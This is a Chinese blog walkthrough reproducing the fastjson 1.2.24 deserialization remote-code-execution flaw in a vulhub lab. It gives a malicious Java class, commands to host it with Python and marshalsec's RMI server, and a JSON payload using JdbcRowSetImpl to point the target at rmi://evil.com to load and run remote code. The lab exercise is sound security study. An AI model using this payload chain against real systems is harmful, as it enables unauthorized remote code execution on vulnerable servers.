fastjson 1.2.24 反序列化导致任意命令执行漏洞

最新推荐文章于 2023-06-24 17:34:34 发布
最新推荐文章于 2023-06-24 17:34:34 发布
阅读量3.2k 收藏 1
点赞数
文章标签: 靶机 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/121649325
版权

fastjson 1.2.24 反序列化导致任意命令执行漏洞

环境搭建vulhub一键启动

https://vulhub.org/#/environments/fastjson/1.2.24-rce/

docker-compose up -d

访问本地ip的8090端口
在这里插入图片描述

1.bp抓包发现对象转换成json格式数据

在这里插入图片描述

2.更换数据测试

右键 change request method 改成post发包,类型改为json
在这里插入图片描述

3.建立rmi服务器

保存java恶意代码如下,(执行 touch /tmp/success)

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
image-20211130165049496

在这里插入图片描述

编译代码,注意此环境需要jdk1.8环境编译,kail默认是11.0版本,需要安装jdk1.8(略),并且选择使用jdk1.8

┌──(root💀kali)-[~]
└─# update-alternatives --config java
有 2 个候选项可用于替换 java (提供 /usr/bin/java)。

  选择       路径                                       优先级  状态
------------------------------------------------------------
* 0            /usr/lib/jvm/java-11-openjdk-amd64/bin/java   1111      自动模式
  1            /usr/lib/jvm/java-11-openjdk-amd64/bin/java   1111      手动模式
  2            /usr/local/jdk1.8/jdk1.8.0_161/bin/java       1         手动模式

要维持当前值[*]请按<回车键>,或者键入选择的编号:2
update-alternatives: 使用 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 来在手动模式中提供 /usr/bin/java (java)
                                                                                                                                                              
┌──(root💀kali)-[~]
└─# java -version                                                                                        
java version "1.8.0_161"
Java(TM) SE Runtime Environment (build 1.8.0_161-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.161-b12, mixed mode)

在这里插入图片描述

javac  编译生成class文件

在这里插入图片描述

当前目录使用python搭建web,发布编译好的文件

 python3 -m http.server 8888

在这里插入图片描述

使用工具marshalsec 搭建rmi服务器

git clone https://github.com/mbechler/marshalsec.git
cd marshalse
mvn clean package -DskipTests   (需要等待一会),要安装maven  apt-git installmaven

在这里插入图片描述

我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class

需要把marshalsec-0.0.3-SNAPSHOT-all.jar拷贝到恶意代码目录

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.8.143:8888/#TouchFile" 9999

在这里插入图片描述

向靶场服务器发送Payload,带上RMI的地址:evil.com改为rmi服务器ip

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述

进入容器发现tmp下有success,反序列化命令执行成功

──(root💀kali)-[~]
└─# docker ps                                                                                                                                           130 ⨯
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS          PORTS                    NAMES
66effc71796b   vulhub/fastjson:1.2.24   "java -Dserver.addre…"   19 hours ago   Up 24 minutes   0.0.0.0:8090->8090/tcp   1224-rce_web_1
                                                                                                                                                              
┌──(root💀kali)-[~]
└─# docker exec -it 66effc71796b /bin/bash
root@66effc71796b:/# cd tmp/
root@66effc71796b:/tmp# ls
hsperfdata_root  tomcat-docbase.3017740528426830119.8090  tomcat.1457512698342180460.8090
success          tomcat-docbase.3871276941847431940.8090  tomcat.2826139588232407997.8090
root@66effc71796b:/tmp#

在这里插入图片描述
Forest深林
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
Fastjson 1.2.24 反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
最新发布
Welcome To Myon'Blog !
03-09 1644
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
bqnagus
10-01 844
fastjsonfastjson 1.2.24 反序列化导致任意命令执行
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 757
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
复现fastjson 1.2.24 反序列化导致任意命令执行漏洞
DXfighting_的博客
04-15 453
生成带有PHP马的class文件 把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在 的目录,Python起一个http服务。 使用marshalsec项目 启动RMI服务, 监听9999端口并加载远程类TouchFile.class: 使用burpsuite抓包后改GET包为POST包,然后在发送的请求数据包中输入以下如图payload 之后使用蚁剑连...
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
fastjson1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
1ance's blog
07-24 1495
CVE-2017-18349漏洞原理 漏洞原理
Fastjson 1.2.24 反序列化导致任意命令执行漏洞
不曾扬帆,何以至远方
07-15 861
fastjson 1.2.24 反序列化
FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
又菜又爱倒腾的博客
10-29 2311
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一、漏洞简介 Pippo是一款基于Java的Web框架。FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
ZxC789456302的博客
09-27 836
开头吐槽一下重装完的kali,太折磨人了,环境重配+各种出错,人已经麻了....需要用到①的jdk
fastjson 1.2.24 反序列化导致任意命令执行漏洞 复现超详细步骤
yc11223344的博客
07-05 1353
在本地启动环境: 首先我们需要一个java的环境 新建文件夹并且在文件夹里面建一个txt文件命名为TouchFile.java,里面写入代码 cmd在文件夹目录运行 就会看到生成了一个class文件可以看一下这位师傅的文章python2.x执行命令为python3.x执行命令为要在class文件下执行命令,进行监听8000端口 我们可以访问:本机ip:8000 我们借助marshalsec项目开启RMI服务,监听9999端口 下载完marshalsec之后,进到该目录下cmd运行会生成一个target文件夹
fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录
爱无止
11-25 2222
环境搭建:小说搜索 shupu.org 漏洞影响版本: fastjson1.2.24以及之前版本存在远程代码执行高危安全漏洞 环境地址: https://github.com/vulhub/vulhub/tree/master/fastjson/vuln 正常访问页面返回hello,world~ 此时抓包修改content-type为json格式,并post payload,即可执...
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349)
m0_58596609的博客
01-05 1371
Fastjson1.2.24反序列化导致任意命令执行(CVE-2017-18349) 超详细
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2935
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2117
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值